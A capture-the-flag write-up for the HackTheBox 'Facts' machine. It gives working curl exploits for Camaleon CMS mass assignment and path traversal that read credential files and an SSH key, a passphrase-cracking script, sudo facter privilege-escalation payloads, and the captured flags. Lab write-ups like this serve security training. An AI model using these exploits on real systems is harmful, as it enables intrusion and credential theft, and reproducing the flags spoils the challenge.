Facts
hackthebox
Task: HackTheBox Facts machine — Camaleon CMS 2.9.0 on Ruby on Rails with Linux privilege escalation. Solution: Exploited two CVEs for CMS privilege escalation and arbitrary file read, cracked encrypted SSH key, then abused sudo permissions on facter utility for root access.
$ ls tags/ techniques/
Facts - HackTheBox
Challenge Information
| Field | Value |
|---|---|
| Platform | HackTheBox |
| Name | Facts |
| Category | Web / Linux Privilege Escalation |
| Difficulty | Medium |
| Target | 10.129.22.178 (facts.htb) |
Description
A HackTheBox machine featuring Camaleon CMS running on Ruby on Rails. The attack chain involves exploiting two CVEs in the CMS for privilege escalation and arbitrary file read, cracking an encrypted SSH key, and finally abusing sudo permissions on the facter utility for root access.
Reconnaissance
Port Scanning
nmap -sC -sV 10.129.22.178
Open Ports:
- 22/tcp - SSH (OpenSSH 9.9p1)
- 53/tcp - DNS
- 80/tcp - HTTP (nginx 1.26.3)
Web Application Analysis
The web server hosts Camaleon CMS 2.9.0 running on Ruby on Rails 8.0.2.
Key endpoints discovered:
/admin/login- Admin login page/admin/register- User registration (with captcha)/admin/users/{id}/updated_ajax- User update endpoint
User Enumeration
Users discovered on the system:
trivia- Regular user with SSH accesswilliam- User with user.txt flagroot- System administrator
Phase 1: Initial Access - Camaleon CMS Admin
User Registration
First, registered a new user account via the /admin/register endpoint. This required solving a captcha challenge.
CVE-2025-2304: Mass Assignment Privilege Escalation
Camaleon CMS is vulnerable to mass assignment in the user update functionality. By adding the role=admin parameter to the update request, a regular user can escalate their privileges to administrator.
Vulnerable Endpoint: /admin/users/{id}/updated_ajax
curl -X POST "http://facts.htb/admin/users/3/updated_ajax" \ -H "Cookie: _camaleon_cms_session=..." \ -d "user[role]=admin&user[first_name]=Test&user[last_name]=User"
Result: User account elevated to CMS administrator.
Phase 2: Arbitrary File Read via Path Traversal
CVE-2024-46987: Path Traversal in File Download
The Camaleon CMS admin panel has a file download feature vulnerable to path traversal, allowing reading of arbitrary files on the system.
Vulnerable Endpoint: /admin/media/download_private_file?file=../../../../path
Extracting Sensitive Files
# Read /etc/passwd curl "http://facts.htb/admin/media/download_private_file?file=../../../../etc/passwd" \ -H "Cookie: _camaleon_cms_session=..." # Read user flag curl "http://facts.htb/admin/media/download_private_file?file=../../../../home/william/user.txt" \ -H "Cookie: _camaleon_cms_session=..." # Read SSH private key curl "http://facts.htb/admin/media/download_private_file?file=../../../../home/trivia/.ssh/id_ed25519" \ -H "Cookie: _camaleon_cms_session=..." # Read Rails master key curl "http://facts.htb/admin/media/download_private_file?file=../../../../var/www/camaleon/config/master.key" \ -H "Cookie: _camaleon_cms_session=..."
Key Findings
| File | Content |
|---|---|
/home/william/user.txt | 988fe10004e4f2c1895e906c743d8d75 |
/home/trivia/.ssh/id_ed25519 | Encrypted SSH key (bcrypt KDF, 24 rounds) |
config/master.key | b0650437b2208a9fab449fb92f67bc40 |
| Database | MinIO/S3 credentials |
Phase 3: SSH Key Cracking
The extracted SSH key for user trivia was encrypted with:
- Cipher: aes256-ctr
- KDF: bcrypt (24 rounds)
Cracking Script
#!/usr/bin/env python3 """ SSH Key Passphrase Cracker for bcrypt-encrypted Ed25519 keys """ import subprocess import sys def try_passphrase(keyfile, passphrase): """Try to decrypt SSH key with given passphrase""" try: result = subprocess.run( ['ssh-keygen', '-y', '-P', passphrase, '-f', keyfile], capture_output=True, timeout=5 ) return result.returncode == 0 except: return False def main(): keyfile = 'ssh_key_trivia.txt' wordlist = '/usr/share/wordlists/rockyou.txt' with open(wordlist, 'r', errors='ignore') as f: for i, line in enumerate(f): passphrase = line.strip() if try_passphrase(keyfile, passphrase): print(f"[+] Found passphrase: {passphrase}") return if i % 1000 == 0: print(f"[*] Tried {i} passwords...") print("[-] Passphrase not found") if __name__ == '__main__': main()
Result: Passphrase found: dragonballz
SSH Access
chmod 600 ssh_key_trivia.txt ssh -i ssh_key_trivia.txt [email protected] # Enter passphrase: dragonballz
Phase 4: Privilege Escalation - Facter GTFOBins
Checking Sudo Permissions
trivia@facts:~$ sudo -l User trivia may run the following commands on facts: (ALL) NOPASSWD: /usr/bin/facter
About Facter
Facter is a Ruby-based system profiling tool from Puppet. It collects system facts and can load custom facts from specified directories.
GTFOBins Exploitation
Facter's --custom-dir option allows loading arbitrary Ruby code as custom facts:
# Create malicious custom fact mkdir -p /tmp/pwn cat > /tmp/pwn/x.rb << 'EOF' Facter.add(:x) do setcode do system("cat /root/root.txt") end end EOF # Execute with sudo sudo /usr/bin/facter --custom-dir=/tmp/pwn x
Result: d44282dbea340ae6177973eec1162bc0
Alternative: Getting a Root Shell
cat > /tmp/pwn/shell.rb << 'EOF' Facter.add(:shell) do setcode do system("/bin/bash") end end EOF sudo /usr/bin/facter --custom-dir=/tmp/pwn shell
Flags
| Flag | Value |
|---|---|
| User | 988fe10004e4f2c1895e906c743d8d75 |
| Root | d44282dbea340ae6177973eec1162bc0 |
Attack Chain Summary
[Reconnaissance]
|
v
[Register User on Camaleon CMS]
|
v
[CVE-2025-2304: Mass Assignment -> Admin]
|
v
[CVE-2024-46987: Path Traversal -> File Read]
|
+---> user.txt (User Flag)
|
+---> SSH Key (encrypted)
|
v
[Crack SSH Key Passphrase: dragonballz]
|
v
[SSH as trivia]
|
v
[sudo -l: facter NOPASSWD]
|
v
[GTFOBins: facter --custom-dir]
|
v
[Root Flag]
Key Vulnerabilities
| CVE | Description | Impact |
|---|---|---|
| CVE-2025-2304 | Camaleon CMS Mass Assignment | Privilege escalation to admin |
| CVE-2024-46987 | Camaleon CMS Path Traversal | Arbitrary file read |
| N/A | Weak SSH key passphrase | Credential compromise |
| N/A | Sudo misconfiguration (facter) | Root privilege escalation |
Key Indicators
Use these techniques when you see:
- Camaleon CMS or Ruby on Rails applications with user management
- File download endpoints with
file=parameter - Encrypted SSH keys with bcrypt KDF (try common wordlists)
facterin sudo -l output (GTFOBins candidate)- Any Puppet-related tools with sudo access
Tools Used
| Tool | Purpose |
|---|---|
| curl | HTTP requests, exploiting web vulnerabilities |
| ssh-keygen | SSH key operations, passphrase verification |
| sshpass | Automated SSH with passphrase |
| Python | Custom SSH key cracking script |
| sqlite3 | Database analysis |
Lessons Learned
-
Mass Assignment Vulnerabilities: Always check for mass assignment in web frameworks, especially in user update endpoints. Adding unexpected parameters like
role=admincan lead to privilege escalation. -
Path Traversal in File Downloads: File download functions are common targets for path traversal. The
../sequences can often bypass basic filters. -
SSH Key Security: Encrypted SSH keys with weak passphrases provide false security. Common wordlists like rockyou.txt can crack them quickly.
-
GTFOBins for Privilege Escalation: Always check GTFOBins (https://gtfobins.github.io/) when you find sudo permissions. Tools like
facterthat can load external code are prime targets. -
Facter Custom Facts: Facter's ability to load Ruby code from custom directories makes it dangerous when available via sudo.
References
$ cat /etc/motd
Liked this one?
Pro unlocks every writeup, every flag, and API access. $9/mo.
$ cat pricing.md$ grep --similar
Similar writeups
- [web][free]Conversor (Full Box)— hackthebox
- [web][free]Browsed— hackthebox
- [pentest][free]WingData (Wing FTP RCE → Python tarfile PATH_MAX bypass)— hackthebox
- [pentest][free]Interpreter (Mirth Connect → f-string Injection)— hackthebox
- [infra][Pro]Скрипт-кидди (Script-kiddie)— hackerlab